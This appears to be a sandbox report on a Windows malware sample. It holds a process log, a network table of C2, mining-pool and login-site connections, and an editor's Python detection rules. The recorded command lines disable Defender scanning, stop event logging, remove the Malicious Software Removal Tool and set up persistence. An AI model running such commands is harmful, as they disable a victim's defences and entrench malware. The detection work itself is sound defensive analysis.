PID 1208 wrote to memory of 2928 N/A N/A C:\Users\Admin\AppData\Local\Temp\BA1D.exe
PID 1208 wrote to memory of 2928 N/A N/A C:\Users\Admin\AppData\Local\Temp\BA1D.exe
PID 1208 wrote to memory of 2928 N/A N/A C:\Users\Admin\AppData\Local\Temp\BA1D.exe
PID 1208 wrote to memory of 2928 N/A N/A C:\Users\Admin\AppData\Local\Temp\BA1D.exe
PID 1208 wrote to memory of 1656 N/A N/A C:\Users\Admin\AppData\Local\Temp\C094.exe
PID 1208 wrote to memory of 1656 N/A N/A C:\Users\Admin\AppData\Local\Temp\C094.exe
PID 1208 wrote to memory of 1656 N/A N/A C:\Users\Admin\AppData\Local\Temp\C094.exe
PID 1208 wrote to memory of 1656 N/A N/A C:\Users\Admin\AppData\Local\Temp\C094.exe
PID 1208 wrote to memory of 1520 N/A N/A C:\Users\Admin\AppData\Local\Temp\E100.exe
PID 1208 wrote to memory of 1520 N/A N/A C:\Users\Admin\AppData\Local\Temp\E100.exe
PID 1208 wrote to memory of 1520 N/A N/A C:\Users\Admin\AppData\Local\Temp\E100.exe
PID 1208 wrote to memory of 1520 N/A N/A C:\Users\Admin\AppData\Local\Temp\E100.exe
PID 1520 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1520 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1520 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1520 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 1520 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 1520 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 1520 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 1208 wrote to memory of 2008 N/A N/A C:\Users\Admin\AppData\Local\Temp\ECF3.exe
PID 1208 wrote to memory of 2008 N/A N/A C:\Users\Admin\AppData\Local\Temp\ECF3.exe
PID 1208 wrote to memory of 2008 N/A N/A C:\Users\Admin\AppData\Local\Temp\ECF3.exe
PID 1208 wrote to memory of 2008 N/A N/A C:\Users\Admin\AppData\Local\Temp\ECF3.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

Uses Task Scheduler COM API

persistence
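The signatures above name the behaviours but not how to catch them on a host. The command lines this detonation recorded (sc.exe creating a service whose binary sits in C:\ProgramData, sc.exe stopping eventlog, schtasks pointing at %Temp%, powershell.exe adding Defender exclusions for the whole user profile and ProgramData, wusa.exe uninstalling KB890830, which is the Malicious Software Removal Tool, and regsvr32 loading a DLL from %Temp%) are the kind of process-creation telemetry a detection engineer would write rules against. The block below is an added example by this editor, not part of the report or of the sandbox's signature set: it runs a small set of regex rules over command lines copied from this detonation's process list, plus the Run key value from the signature above, and a few routine command lines from the same run that must not fire. The rule names, the ATT&CK technique mapping and the notion of a "user-writable path" are this editor's assumptions.

```python
import re

# Directories the malware can write to as the logged-on user. Nothing that
# installs a service, scheduled task or Run entry from here should be trusted.
# (Assumption for this example; tune to the environment.)
USER_WRITABLE = r'(?:\\Users\\[^\\]+\\AppData\\|\\ProgramData\\|\\Temp\\)'

# Rule name, ATT&CK technique (this editor's mapping, not the report's) and a
# regex over the full command line.
CMDLINE_RULES = [
    ("defender_exclusion_added", "T1562.001",
     re.compile(r'Add-MpPreference\b.*-Exclusion(?:Path|Extension|Process)', re.I)),
    ("eventlog_service_stopped", "T1562.002",
     re.compile(r'\bsc(?:\.exe)?\s+stop\s+"?eventlog"?', re.I)),
    # KB890830 is the Malicious Software Removal Tool; removing it is never routine.
    ("msrt_uninstalled", "T1562.001",
     re.compile(r'\bwusa(?:\.exe)?\s+/uninstall\s+/kb:890830\b', re.I)),
    ("service_binary_in_user_writable_path", "T1543.003",
     re.compile(r'\bsc(?:\.exe)?\s+create\b.*binpath=\s*"?[^"]*' + USER_WRITABLE, re.I)),
    ("scheduled_task_in_user_writable_path", "T1053.005",
     re.compile(r'\bschtasks(?:\.exe)?\s+/create\b.*/tr\s+"?\'?[^"\']*' + USER_WRITABLE, re.I)),
    ("regsvr32_loads_user_writable_dll", "T1218.010",
     re.compile(r'\bregsvr32(?:\.exe)?\b.*' + USER_WRITABLE + r'[^\s"]*\.dll\b', re.I)),
]

# Windows system process names that malware borrows for Run values and file names.
SYSTEM_PROCESS_NAMES = {"csrss", "smss", "lsass", "winlogon", "svchost", "explorer"}

# Command lines copied from this detonation's process list, plus routine ones
# from the same run (sc start/delete, makecab, chcp) that must not fire.
DETONATION_CMDLINES = [
    r'regsvr32 /s C:\Users\Admin\AppData\Local\Temp\A4D8.dll',
    r"""schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F""",
    r"""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force""",
    r'wusa /uninstall /kb:890830 /quiet /norestart',
    r'C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"',
    r'C:\Windows\system32\sc.exe start "UTIXDCVF"',
    r'C:\Windows\system32\sc.exe stop eventlog',
    r'C:\Windows\system32\sc.exe delete "UTIXDCVF"',
    r'"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240223045010.log C:\Windows\Logs\CBS\CbsPersist_20240223045010.cab',
    'chcp 1251',
]

# The Run value from the "Adds Run key" signature (name, data), unescaped.
RUN_VALUE = ("CSRSS", r'"C:\ProgramData\Drivers\csrss.exe"')


def classify_cmdline(cmdline):
    """Return [(rule, technique), ...] for every rule the command line trips."""
    return [(name, tech) for name, tech, rx in CMDLINE_RULES if rx.search(cmdline)]


def classify_run_value(value_name, value_data):
    """Flag a Run value whose target is in a user-writable directory, and one
    whose value name mimics a Windows system process."""
    hits = []
    if re.search(USER_WRITABLE, value_data, re.I):
        hits.append(("run_key_target_in_user_writable_path", "T1547.001"))
    if value_name.lower() in SYSTEM_PROCESS_NAMES:
        hits.append(("run_key_name_mimics_system_process", "T1036.005"))
    return hits


def scan(cmdlines):
    """Map each command line that trips at least one rule to its hits."""
    classified = ((c, classify_cmdline(c)) for c in cmdlines)
    return {c: hits for c, hits in classified if hits}


if __name__ == "__main__":
    for cmdline, hits in scan(DETONATION_CMDLINES).items():
        print(hits, "<-", cmdline)
    print(classify_run_value(*RUN_VALUE), "<- Run value", RUN_VALUE)
```

Six of the ten command lines fire and the four routine ones stay quiet. The path-based rules deliberately key on where the service binary, task target or DLL lives rather than on the random names (UTIXDCVF, vueqjgslwynd.exe, A4D8.dll), which change per sample; the eventlog and KB890830 rules need no path at all, because there is no legitimate reason for either command.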

Processes

C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe

"C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe"

C:\Users\Admin\AppData\Local\Temp\A083.exe

C:\Users\Admin\AppData\Local\Temp\A083.exe

C:\Users\Admin\AppData\Local\Temp\A083.exe

C:\Users\Admin\AppData\Local\Temp\A083.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\A4D8.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\A4D8.dll

C:\Users\Admin\AppData\Local\Temp\BA1D.exe

C:\Users\Admin\AppData\Local\Temp\BA1D.exe

C:\Users\Admin\AppData\Local\Temp\C094.exe

C:\Users\Admin\AppData\Local\Temp\C094.exe

C:\Users\Admin\AppData\Local\Temp\E100.exe

C:\Users\Admin\AppData\Local\Temp\E100.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\ECF3.exe

C:\Users\Admin\AppData\Local\Temp\ECF3.exe

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\600.exe

C:\Users\Admin\AppData\Local\Temp\600.exe

C:\Users\Admin\AppData\Local\Temp\is-U9REL.tmp\600.tmp

"C:\Users\Admin\AppData\Local\Temp\is-U9REL.tmp\600.tmp" /SL5="$201DC,4470470,54272,C:\Users\Admin\AppData\Local\Temp\600.exe"

C:\Users\Admin\AppData\Local\Temp\1961.exe

C:\Users\Admin\AppData\Local\Temp\1961.exe

C:\Users\Admin\AppData\Local\Temp\nso191E.tmp

C:\Users\Admin\AppData\Local\Temp\nso191E.tmp

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Users\Admin\AppData\Local\Temp\26EA.exe

C:\Users\Admin\AppData\Local\Temp\26EA.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\is-9JUEJ.tmp\1961.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9JUEJ.tmp\1961.tmp" /SL5="$40204,4314505,54272,C:\Users\Admin\AppData\Local\Temp\1961.exe"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "UTIXDCVF"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "UTIXDCVF"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\taskeng.exe

taskeng.exe {A931430C-753A-455E-B231-CD59EB70E8D1} S-1-5-21-1650401615-1019878084-3673944445-1000:UADPPTXT\Admin:Interactive:[1]

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240223045010.log C:\Windows\Logs\CBS\CbsPersist_20240223045010.cab

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

"C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Roaming\getvuvu

C:\Users\Admin\AppData\Roaming\getvuvu

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

Network

Country Destination Domain Proto
US 8.8.8.8:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
US 62.216.85.110:34049 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 184.105.221.249:443 tcp
DE 93.186.202.32:9001 tcp
US 128.31.0.39:9101 tcp
US 162.247.74.201:443 tcp
US 8.8.8.8:53 trmpc.com udp
MX 187.211.34.223:80 trmpc.com tcp
N/A 127.0.0.1:49270 tcp
FI 194.34.134.13:9007 tcp
LV 94.140.120.130:443 tcp
US 8.8.8.8:53 en.bestsup.su udp
US 104.21.29.103:80 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
DE 185.172.128.127:80 185.172.128.127 tcp
DE 185.172.128.145:80 185.172.128.145 tcp
FI 194.34.134.13:9007 tcp
LV 94.140.120.130:443 tcp
AT 5.42.64.33:80 5.42.64.33 tcp
US 8.8.8.8:53 z-shadow.info udp
US 8.8.8.8:53 zmodeler3.com udp
US 8.8.8.8:53 z-shadow.info udp
US 8.8.8.8:53 pornhubpremium.com udp
US 8.8.8.8:53 aminoapps.com udp
US 8.8.8.8:53 zmodeler3.com udp
US 8.8.8.8:53 zmodeler3.com udp
US 8.8.8.8:53 pornhubpremium.com udp
US 8.8.8.8:53 pornhubpremium.com udp
US 8.8.8.8:53 aminoapps.com udp
US 8.8.8.8:53 mx156.hostedmxserver.com udp
US 8.8.8.8:53 bitmax.io udp
US 8.8.8.8:53 bitmax.io udp
US 8.8.8.8:53 unite.nike.com udp
US 8.8.8.8:53 www30.mercantilbanco.com udp
US 8.8.8.8:53 mobile.twitter.com udp
US 8.8.8.8:53 unite.nike.com udp
US 8.8.8.8:53 lpse.blitarkab.go.id udp
US 8.8.8.8:53 unite.nike.com udp
US 8.8.8.8:53 aspmx.l.google.com udp
US 8.8.8.8:53 www30.mercantilbanco.com udp
US 8.8.8.8:53 mxa-002a0701.gslb.pphosted.com udp
US 8.8.8.8:53 www30.mercantilbanco.com udp
US 8.8.8.8:53 mobile.twitter.com udp
US 8.8.8.8:53 mxa-002a0701.gslb.pphosted.com udp
US 8.8.8.8:53 lpse.blitarkab.go.id udp
US 8.8.8.8:53 registrazione.comune.milano.it udp
US 8.8.8.8:53 registrazione.comune.milano.it udp
US 8.8.8.8:53 id.g2a.com udp
US 8.8.8.8:53 dapesa.biz udp
US 8.8.8.8:53 id.g2a.com udp
US 8.8.8.8:53 dapesa.biz udp
US 8.8.8.8:53 app-vlc.hotmart.com udp
US 8.8.8.8:53 pt.chaturbate.com udp
US 8.8.8.8:53 app-vlc.hotmart.com udp
US 8.8.8.8:53 m.anibis.ch udp
US 8.8.8.8:53 aakash.ac.in udp
US 8.8.8.8:53 pt.chaturbate.com udp
US 8.8.8.8:53 users.nexusmods.com udp
US 8.8.8.8:53 m.anibis.ch udp
US 8.8.8.8:53 inbound-smtp.us-east-1.amazonaws.com udp
US 8.8.8.8:53 mailhandler.g2a.com udp
US 8.8.8.8:53 mailhandler.g2a.com udp
US 8.8.8.8:53 m.anibis.ch udp
US 8.8.8.8:53 aakash.ac.in udp
US 8.8.8.8:53 bitexen.com udp
US 8.8.8.8:53 gamerarena.com udp
US 8.8.8.8:53 auth.riotgames.com udp
US 8.8.8.8:53 users.nexusmods.com udp
US 8.8.8.8:53 bitexen.com udp
US 8.8.8.8:53 gamerarena.com udp
US 8.8.8.8:53 users.nexusmods.com udp
US 8.8.8.8:53 gamerarena.com udp
US 8.8.8.8:53 auth.riotgames.com udp
US 8.8.8.8:53 gamerarena.com udp
US 8.8.8.8:53 ntamoney.pw udp
US 8.8.8.8:53 parent.neverskip.com udp
US 8.8.8.8:53 ntamoney.pw udp
US 8.8.8.8:53 parent.neverskip.com udp
US 8.8.8.8:53 bitexen-com.mail.protection.outlook.com udp
US 8.8.8.8:53 mx.yandex.net udp
US 8.8.8.8:53 prt.windscribe.com udp
US 8.8.8.8:53 mx.yandex.net udp
US 8.8.8.8:53 pokersoda.info udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 vivekbindraslc.com udp
US 8.8.8.8:53 prt.windscribe.com udp
US 8.8.8.8:53 prt.windscribe.com udp
US 8.8.8.8:53 pokersoda.info udp
US 8.8.8.8:53 pokersoda.info udp
US 8.8.8.8:53 pokersoda.info udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 vivekbindraslc.com udp
US 8.8.8.8:53 patria.org.ve udp
US 8.8.8.8:53 selfcare.safaricom.co.ke udp
US 8.8.8.8:53 vivekbindraslc.com udp
US 8.8.8.8:53 pscwb.ucanapply.com udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 pscwb.ucanapply.com udp
US 8.8.8.8:53 pscwb.ucanapply.com udp
US 8.8.8.8:53 xn--12cf3e2aboqw2gm3je2n.com udp
US 8.8.8.8:53 patria.org.ve udp
US 8.8.8.8:53 patria.org.ve udp
US 8.8.8.8:53 xn--12cf3e2aboqw2gm3je2n.com udp
US 8.8.8.8:53 seller.shopee.co.id udp
US 8.8.8.8:53 business.facebook.com udp
US 8.8.8.8:53 business.facebook.com udp
US 8.8.8.8:53 seller.shopee.co.id udp
US 8.8.8.8:53 correo.patria.org.ve udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 freemining.co udp
US 8.8.8.8:53 ssl.zc.qq.com udp
US 8.8.8.8:53 sainsburys.taleo.net udp
US 8.8.8.8:53 sistemaup.app udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 ssl.zc.qq.com udp
US 8.8.8.8:53 freemining.co udp
US 8.8.8.8:53 smtpin.vvv.facebook.com udp
US 8.8.8.8:53 sainsburys.taleo.net udp
US 8.8.8.8:53 ssl.zc.qq.com udp
US 8.8.8.8:53 ssl.zc.qq.com udp
US 8.8.8.8:53 bitsforclicks.com udp
US 8.8.8.8:53 store.serif.com udp
US 8.8.8.8:53 forum.gsmdevelopers.com udp
US 8.8.8.8:53 sistemaup.app udp
US 8.8.8.8:53 store.serif.com udp
US 8.8.8.8:53 sistemaup.app udp
US 8.8.8.8:53 bitsforclicks.com udp
US 8.8.8.8:53 mx2.privateemail.com udp
US 8.8.8.8:53 bitsforclicks.com udp
US 8.8.8.8:53 mx2.privateemail.com udp
US 8.8.8.8:53 forum.gsmdevelopers.com udp
US 8.8.8.8:53 bitsforclicks.com udp
US 8.8.8.8:53 transcash.espace-personnel.fr udp
US 8.8.8.8:53 login.ezp.tccd.edu udp
US 8.8.8.8:53 park-mx.above.com udp
US 8.8.8.8:53 transcash.espace-personnel.fr udp
US 8.8.8.8:53 login.ezp.tccd.edu udp
US 8.8.8.8:53 launcherfenix.com.ar udp
US 8.8.8.8:53 netbanking.kotak.com udp
US 8.8.8.8:53 netbanking.kotak.com udp
US 172.67.74.133:21 transcash.espace-personnel.fr tcp
GB 18.154.84.5:465 store.serif.com tcp
SG 103.204.130.192:143 forum.gsmdevelopers.com tcp
US 147.182.130.78:995 mx156.hostedmxserver.com tcp
US 172.67.74.133:443 transcash.espace-personnel.fr tcp
US 104.18.10.111:22 netbanking.kotak.com tcp
US 8.8.8.8:53 tezerac.com udp
US 8.8.8.8:53 cdn.testout.com udp
US 8.8.8.8:53 tezerac.com udp
US 8.8.8.8:53 tezerac.com udp
US 8.8.8.8:53 launcherfenix.com.ar udp
US 8.8.8.8:53 launcherfenix.com.ar udp
US 8.8.8.8:53 cdn.testout.com udp
GB 18.154.84.31:465 store.serif.com tcp
US 104.18.11.111:22 netbanking.kotak.com tcp
US 104.26.0.108:21 transcash.espace-personnel.fr tcp
GB 18.154.84.5:995 store.serif.com tcp
GB 18.154.84.21:465 store.serif.com tcp
SG 103.204.130.192:465 forum.gsmdevelopers.com tcp
GB 18.154.84.5:80 store.serif.com tcp
NL 164.90.197.79:995 mx156.hostedmxserver.com tcp
US 152.199.21.175:22 cdn.testout.com tcp
US 64.28.242.31:143 login.ezp.tccd.edu tcp
US 50.3.150.96:22 tezerac.com tcp
US 172.67.153.84:21 launcherfenix.com.ar tcp
US 104.21.72.175:443 launcherfenix.com.ar tcp
GB 18.154.84.31:995 store.serif.com tcp
US 172.67.74.133:143 transcash.espace-personnel.fr tcp
US 50.3.150.96:443 tezerac.com tcp
US 8.8.8.8:53 m.comixology.com udp
US 104.26.0.108:143 transcash.espace-personnel.fr tcp
US 8.8.8.8:53 tribalwars.com.pt udp
SG 103.204.130.192:80 forum.gsmdevelopers.com tcp
US 104.18.10.111:443 netbanking.kotak.com tcp
US 8.8.8.8:53 ftp.xn--12cf3e2aboqw2gm3je2n.com udp
US 8.8.8.8:53 ftp.vivekbindraslc.com udp
US 8.8.8.8:53 mail.m.anibis.ch udp
US 8.8.8.8:53 m.comixology.com udp
US 64.28.242.31:80 login.ezp.tccd.edu tcp
US 8.8.8.8:53 my.sp.com.sa udp
US 8.8.8.8:53 ftp.ntamoney.pw udp
US 8.8.8.8:53 sammobile.com udp
US 8.8.8.8:53 onlineftp.ch udp
US 8.8.8.8:53 _dc-mx.c1d018000cb5.launcherfenix.com.ar udp
US 8.8.8.8:53 tribalwars.com.pt udp
US 8.8.8.8:53 ftp.m.anibis.ch udp
US 8.8.8.8:53 my.sp.com.sa udp
US 8.8.8.8:53 tribalwars.com.pt udp
US 8.8.8.8:53 paymyfines.co.za udp
US 8.8.8.8:53 logon.merrickbank.com udp
US 8.8.8.8:53 my.minecraft.net udp
US 8.8.8.8:53 sammobile.com udp
US 8.8.8.8:53 my.sp.com.sa udp
US 8.8.8.8:53 onlineftp.ch udp
US 8.8.8.8:53 paymyfines.co.za udp
US 8.8.8.8:53 extern-gateway.innogames.de udp
US 8.8.8.8:53 paymyfines.co.za udp
US 8.8.8.8:53 my.minecraft.net udp
US 8.8.8.8:53 logon.merrickbank.com udp
US 8.8.8.8:53 logon.merrickbank.com udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 8.8.8.8:53 icarus.axeso5.com udp
US 8.8.8.8:53 icarus.axeso5.com udp
US 104.20.203.54:22 sammobile.com tcp
US 172.67.74.133:80 transcash.espace-personnel.fr tcp
US 104.21.72.175:21 launcherfenix.com.ar tcp
US 50.3.150.96:465 tezerac.com tcp
US 104.21.72.175:80 launcherfenix.com.ar tcp
US 104.18.10.111:80 netbanking.kotak.com tcp
US 152.199.21.175:22 cdn.testout.com tcp
US 172.66.0.96:22 onlineftp.ch tcp
US 50.3.150.96:995 tezerac.com tcp
US 152.199.21.175:80 cdn.testout.com tcp
US 172.66.0.96:21 onlineftp.ch tcp
US 100.25.87.131:80 m.comixology.com tcp
IE 54.76.188.109:21 paymyfines.co.za tcp
SA 185.12.164.100:443 my.sp.com.sa tcp
US 172.66.0.96:443 onlineftp.ch tcp
US 50.3.150.96:80 tezerac.com tcp
GB 18.154.84.5:443 store.serif.com tcp
US 100.25.87.131:143 m.comixology.com tcp
US 64.28.242.31:143 login.ezp.tccd.edu tcp
IE 54.76.188.109:443 paymyfines.co.za tcp
US 8.8.8.8:53 filenext.com udp
US 104.20.203.54:443 sammobile.com tcp
IE 54.76.188.109:22 paymyfines.co.za tcp
US 104.18.10.111:80 netbanking.kotak.com tcp
US 100.25.87.131:995 m.comixology.com tcp
US 208.91.232.174:22 logon.merrickbank.com tcp
US 208.91.232.174:21 logon.merrickbank.com tcp
US 8.8.8.8:53 logon.merrickbank.com udp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 filenext.com udp
US 8.8.8.8:53 signin.aws.amazon.com udp
US 8.8.8.8:53 mobile.sum99.club udp
US 8.8.8.8:53 mail.xn--12cf3e2aboqw2gm3je2n.com udp
DE 212.53.152.28:80 tribalwars.com.pt tcp
US 8.8.8.8:53 paymyfines-co-za.mail.protection.outlook.com udp
SG 103.204.130.192:80 forum.gsmdevelopers.com tcp
US 104.18.10.111:443 netbanking.kotak.com tcp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 www.paymyfines.co.za udp
US 8.8.8.8:53 signin.aws.amazon.com udp
US 8.8.8.8:53 ssh.vivekbindraslc.com udp
US 8.8.8.8:53 mail.ntamoney.pw udp
US 8.8.8.8:53 mobile.sum99.club udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 stagenget.irctc.co.in udp
US 8.8.8.8:53 mx.zoho.com udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 us-smtp-inbound-1.mimecast.com udp
US 8.8.8.8:53 stagenget.irctc.co.in udp
US 64.28.242.31:80 login.ezp.tccd.edu tcp
US 8.8.8.8:53 stagenget.irctc.co.in udp
US 8.8.8.8:53 www.tribalwars.com.pt udp
US 172.67.74.133:443 transcash.espace-personnel.fr tcp
GB 18.154.84.5:80 store.serif.com tcp
US 100.25.87.131:443 m.comixology.com tcp
US 152.199.21.175:443 cdn.testout.com tcp
US 8.8.8.8:53 ssh.xn--12cf3e2aboqw2gm3je2n.com udp
US 104.21.72.175:443 launcherfenix.com.ar tcp
US 50.3.150.96:80 tezerac.com tcp
SA 185.12.164.100:80 my.sp.com.sa tcp
US 34.205.180.247:80 icarus.axeso5.com tcp
IE 54.76.188.109:80 paymyfines.co.za tcp
US 172.67.197.159:80 filenext.com tcp
US 104.20.203.54:80 sammobile.com tcp
US 208.91.232.174:80 logon.merrickbank.com tcp
DE 212.53.152.28:80 www.tribalwars.com.pt tcp
GB 23.214.154.77:80 steamcommunity.com tcp
US 172.66.0.96:80 onlineftp.ch tcp
US 8.8.8.8:53 pokemon-planet.com udp
US 8.8.8.8:53 nosdevoirs.fr udp
US 8.8.8.8:53 logon.merrickbank.com udp
US 8.8.8.8:53 m.comixology.com udp
US 104.18.10.111:80 netbanking.kotak.com tcp
US 103.224.212.217:80 mobile.sum99.club tcp
US 8.8.8.8:53 mail.vivekbindraslc.com udp
US 8.8.8.8:53 onlineftp.ch udp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 pokemon-planet.com udp
US 8.8.8.8:53 paymyfines-co-za.mail.protection.outlook.com udp
US 8.8.8.8:53 kimcartoon.to udp
US 8.8.8.8:53 pokemon-planet.com udp
US 8.8.8.8:53 service.csis.ir udp
